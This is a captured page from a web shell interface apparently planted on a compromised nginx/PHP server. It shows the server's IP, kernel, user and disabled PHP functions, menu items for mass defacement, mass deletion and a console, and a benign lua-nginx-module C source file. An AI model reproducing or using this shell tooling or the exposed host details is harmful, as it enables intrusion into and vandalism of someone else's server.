shell bypass 403

GrazzMean Shell

: /www/server/nginx/src/lua_nginx_module/src/ [ drwxr-xr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.141
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
upload mass deface mass delete console

name : ngx_http_lua_pcrefix.c 

/*
 * Copyright (C) Xiaozhe Wang (chaoslawful)
 * Copyright (C) Yichun Zhang (agentzh)
 */


#ifndef DDEBUG
#define DDEBUG 0
#endif
#include "ddebug.h"


#include "ngx_http_lua_pcrefix.h"
#include "stdio.h"

#if (NGX_PCRE)

static ngx_pool_t *ngx_http_lua_pcre_pool = NULL;

static void *(*old_pcre_malloc)(size_t);
static void (*old_pcre_free)(void *ptr);


/* XXX: work-around to nginx regex subsystem, must init a memory pool
 * to use PCRE functions. As PCRE still has memory-leaking problems,
 * and nginx overwrote pcre_malloc/free hooks with its own static
 * functions, so nobody else can reuse nginx regex subsystem... */
static void *
ngx_http_lua_pcre_malloc(size_t size)
{
    dd("lua pcre pool is %p", ngx_http_lua_pcre_pool);

    if (ngx_http_lua_pcre_pool) {
        return ngx_palloc(ngx_http_lua_pcre_pool, size);
    }

    fprintf(stderr, "error: lua pcre malloc failed due to empty pcre pool");

    return NULL;
}


static void
ngx_http_lua_pcre_free(void *ptr)
{
    dd("lua pcre pool is %p", ngx_http_lua_pcre_pool);

    if (ngx_http_lua_pcre_pool) {
        ngx_pfree(ngx_http_lua_pcre_pool, ptr);
        return;
    }

    fprintf(stderr, "error: lua pcre free failed due to empty pcre pool");
}


ngx_pool_t *
ngx_http_lua_pcre_malloc_init(ngx_pool_t *pool)
{
    ngx_pool_t          *old_pool;

    if (pcre_malloc != ngx_http_lua_pcre_malloc) {

        dd("overriding nginx pcre malloc and free");

        ngx_http_lua_pcre_pool = pool;

        old_pcre_malloc = pcre_malloc;
        old_pcre_free = pcre_free;

        pcre_malloc = ngx_http_lua_pcre_malloc;
        pcre_free = ngx_http_lua_pcre_free;

        return NULL;
    }

    dd("lua pcre pool was %p", ngx_http_lua_pcre_pool);

    old_pool = ngx_http_lua_pcre_pool;
    ngx_http_lua_pcre_pool = pool;

    dd("lua pcre pool is %p", ngx_http_lua_pcre_pool);

    return old_pool;
}


void
ngx_http_lua_pcre_malloc_done(ngx_pool_t *old_pool)
{
    dd("lua pcre pool was %p", ngx_http_lua_pcre_pool);

    ngx_http_lua_pcre_pool = old_pool;

    dd("lua pcre pool is %p", ngx_http_lua_pcre_pool);

    if (old_pool == NULL) {
        pcre_malloc = old_pcre_malloc;
        pcre_free = old_pcre_free;
    }
}

#endif /* NGX_PCRE */

/* vi:set ft=c ts=4 sw=4 et fdm=marker: */
© 2026 GrazzMean